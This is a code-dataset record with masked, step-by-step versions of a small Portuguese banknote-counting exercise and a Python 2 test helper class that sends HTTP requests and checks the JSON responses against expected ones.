<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if numero % multiplo == 0:
notas = numero / multiplo
return notas
else:
return -1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if numero % multiplo == 0:
notas = numero / multiplo
return notas
else:
return -1
<|reserved_special_token_0|>
if resultado != -1:
print('{} nota(s) de R$ {}'.format(resultado, 100))
<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if numero % multiplo == 0:
notas = numero / multiplo
return notas
else:
return -1
entrada = int(input())
resultado = contador_notas(100, entrada)
if resultado != -1:
print('{} nota(s) de R$ {}'.format(resultado, 100))
<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if(numero % multiplo == 0):
notas = numero / multiplo
return notas
else:
return -1
entrada = int(input())
resultado = contador_notas(100, entrada)
if (resultado != -1):
print("{} nota(s) de R$ {}".format(resultado, 100))
|
flexible
|
{
"blob_id": "a5c19ad60ac6312631273858cebaae944a2008ec",
"index": 8876,
"step-1": "<mask token>\n",
"step-2": "def contador_notas(multiplo, numero):\n if numero % multiplo == 0:\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\n<mask token>\n",
"step-3": "def contador_notas(multiplo, numero):\n if numero % multiplo == 0:\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\n<mask token>\nif resultado != -1:\n print('{} nota(s) de R$ {}'.format(resultado, 100))\n",
"step-4": "def contador_notas(multiplo, numero):\n if numero % multiplo == 0:\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\nentrada = int(input())\nresultado = contador_notas(100, entrada)\nif resultado != -1:\n print('{} nota(s) de R$ {}'.format(resultado, 100))\n",
"step-5": "def contador_notas(multiplo, numero):\n if(numero % multiplo == 0):\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\nentrada = int(input())\nresultado = contador_notas(100, entrada)\nif (resultado != -1):\n print(\"{} nota(s) de R$ {}\".format(resultado, 100))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
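
One detail of this row worth noting (an illustrative sketch, not a dataset row): `numero / multiplo` is true division in Python 3, so the computed bill count is a float such as `3.0`; floor division (`//`) would be needed for a whole-number count.

```python
def contador_notas(multiplo, numero):
    # Same logic as the row above: a count of bills only when evenly divisible.
    if numero % multiplo == 0:
        return numero / multiplo  # true division -> float in Python 3
    return -1

print(contador_notas(100, 300))  # 3.0 (a float, because of true division)
print(contador_notas(100, 250))  # -1
```
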
<|reserved_special_token_0|>
class Handler(object):
<|reserved_special_token_0|>
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
<|reserved_special_token_0|>
def _check_format(self, origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(expected_rsp
), """Length of dict is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}""".format(
origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(key
), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(
str(key))
logging.warning(
u'Check value for the same key: [{}] in origin_rsp and expected_rsp'
.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning(
"""Length of list is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
assert len(origin_rsp) == len(expected_rsp
), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)
) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,
unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
"""Check format fail!!!! We get different value here!!
origin_rsp:
{}
but we expect to see in expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
<|reserved_special_token_0|>
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
def check_rsp(self, origin_rsp, expected_rsp, check_format=False,
check_partial_rsp=False, check_length=False,
check_format_ignore_list_length=False, check_format_null_str=False):
if check_format:
logging.warning(
'Now start to check format for origin_rsp and expected_rsp!')
self._check_format(origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str)
if check_partial_rsp:
self._check_partial_rsp(expected_rsp, origin_rsp)
if check_length is not False:
for key, expected_length in check_length.iteritems():
current_length = len(origin_rsp[key])
assert expected_length == current_length, "We expect to see length of '{}' in origin_rsp is {}, but now it is {}".format(
key, expected_length, current_length)
if not any([check_format, check_partial_rsp, check_length]):
sorted_expected_rsp = self._order_json(expected_rsp)
sorted_origin_rsp = self._order_json(origin_rsp)
logging.warning('\nWe expect to see \n\n{}, \n\nand we get \n\n{}.'
.format(sorted_expected_rsp, sorted_origin_rsp))
assert sorted_expected_rsp == sorted_origin_rsp, "We don't get the expected,please check the log"
logging.warning('\x1b[0;32m check_rsp done!!! PASS\x1b[0m')
def _check_format(self, origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(expected_rsp
), """Length of dict is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}""".format(
origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(key
), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(
str(key))
logging.warning(
u'Check value for the same key: [{}] in origin_rsp and expected_rsp'
.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning(
"""Length of list is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
assert len(origin_rsp) == len(expected_rsp
), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)
) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,
unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
"""Check format fail!!!! We get different value here!!
origin_rsp:
{}
but we expect to see in expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
def _order_json(self, json_string):
"""
Return an ordered list for compare.
:param json_string: string in json format
:return: an ordered list
"""
if isinstance(json_string, dict):
return sorted((k, self._order_json(v)) for k, v in json_string.
items())
if isinstance(json_string, list):
return sorted(self._order_json(x) for x in json_string)
else:
return json_string
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
import requests
import logging
import json
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
def check_rsp(self, origin_rsp, expected_rsp, check_format=False,
check_partial_rsp=False, check_length=False,
check_format_ignore_list_length=False, check_format_null_str=False):
if check_format:
logging.warning(
'Now start to check format for origin_rsp and expected_rsp!')
self._check_format(origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str)
if check_partial_rsp:
self._check_partial_rsp(expected_rsp, origin_rsp)
if check_length is not False:
for key, expected_length in check_length.iteritems():
current_length = len(origin_rsp[key])
assert expected_length == current_length, "We expect to see length of '{}' in origin_rsp is {}, but now it is {}".format(
key, expected_length, current_length)
if not any([check_format, check_partial_rsp, check_length]):
sorted_expected_rsp = self._order_json(expected_rsp)
sorted_origin_rsp = self._order_json(origin_rsp)
logging.warning('\nWe expect to see \n\n{}, \n\nand we get \n\n{}.'
.format(sorted_expected_rsp, sorted_origin_rsp))
assert sorted_expected_rsp == sorted_origin_rsp, "We don't get the expected,please check the log"
logging.warning('\x1b[0;32m check_rsp done!!! PASS\x1b[0m')
def _check_format(self, origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(expected_rsp
), """Length of dict is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}""".format(
origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(key
), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(
str(key))
logging.warning(
u'Check value for the same key: [{}] in origin_rsp and expected_rsp'
.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning(
"""Length of list is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
assert len(origin_rsp) == len(expected_rsp
), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)
) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,
unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
"""Check format fail!!!! We get different value here!!
origin_rsp:
{}
but we expect to see in expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
def _order_json(self, json_string):
"""
Return an ordered list for compare.
:param json_string: string in json format
:return: an ordered list
"""
if isinstance(json_string, dict):
return sorted((k, self._order_json(v)) for k, v in json_string.
items())
if isinstance(json_string, list):
return sorted(self._order_json(x) for x in json_string)
else:
return json_string
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
import requests
import logging
import json
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
# get an active token and get prepared for sending request
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning('when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning('\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n'.
format(url, repr(rsp), repr(rsp.text)))
return rsp
def check_rsp(self, origin_rsp, expected_rsp, check_format=False, check_partial_rsp=False, check_length=False,
check_format_ignore_list_length=False, check_format_null_str=False):
if check_format:
logging.warning('Now start to check format for origin_rsp and expected_rsp!')
self._check_format(origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str)
if check_partial_rsp:
self._check_partial_rsp(expected_rsp, origin_rsp)
if check_length is not False:
for key, expected_length in check_length.iteritems():
current_length = len(origin_rsp[key])
assert expected_length == current_length, \
'We expect to see length of \'{}\' in origin_rsp is {}, but now it is {}'.format(
key, expected_length, current_length)
if not any([check_format, check_partial_rsp, check_length]):
sorted_expected_rsp = self._order_json(expected_rsp)
sorted_origin_rsp = self._order_json(origin_rsp)
logging.warning('\nWe expect to see \n\n{}, \n\nand we get \n\n{}.'.format(sorted_expected_rsp,
sorted_origin_rsp))
assert sorted_expected_rsp == sorted_origin_rsp, \
'We don\'t get the expected,please check the log'
logging.warning('\033[0;32m check_rsp done!!! PASS\033[0m')
def _check_format(self, origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(
expected_rsp), 'Length of dict is not right! Please check the length.\norigin_rsp: ' \
'\n{}\nexpected_rsp: \n{}'.format(origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(
key), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(str(key))
logging.warning(u'Check value for the same key: [{}] in origin_rsp and expected_rsp'.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning('Length of list is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp:'
' \n{}'.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[index],
check_format_ignore_list_length, check_format_null_str)
else:
assert len(origin_rsp) == len(
expected_rsp), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[index],
check_format_ignore_list_length, check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)) and (
isinstance(expected_rsp, str) or isinstance(expected_rsp, unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
'Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in '
'expected_rsp: \n{}'.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
def _order_json(self, json_string):
"""
Return an ordered list for compare.
:param json_string: string in json format
:return: an ordered list
"""
if isinstance(json_string, dict):
return sorted((k, self._order_json(v)) for k, v in json_string.items())
if isinstance(json_string, list):
return sorted(self._order_json(x) for x in json_string)
else:
return json_string
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning('Start to check if expected_rsp: {} is part of origin_rsp: {}'.format(exp, ori))
# so far, leaf node could be string or list which must be exactly the same
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, 'key \'{}\' does not exist in original response.'.format(k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index] in ori, 'exp: {} does not in ori: {}'.format(exp[index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp, ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(subset_dict, whole_dict)
|
flexible
|
{
"blob_id": "00228facd19c72bebd9afbbe52597e390233d41e",
"index": 5822,
"step-1": "<mask token>\n\n\nclass Handler(object):\n <mask token>\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n <mask token>\n <mask token>\n <mask token>\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-2": "<mask token>\n\n\nclass Handler(object):\n\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n <mask token>\n\n def _check_format(self, origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str):\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(expected_rsp\n ), \"\"\"Length of dict is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\".format(\n origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(key\n ), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(\n str(key))\n logging.warning(\n u'Check value for the same key: [{}] in origin_rsp and expected_rsp'\n .format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning(\n \"\"\"Length of list is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n assert len(origin_rsp) == len(expected_rsp\n ), 'Length of list is not right! Please check the length.'\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)\n ) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,\n unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n \"\"\"Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in expected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! 
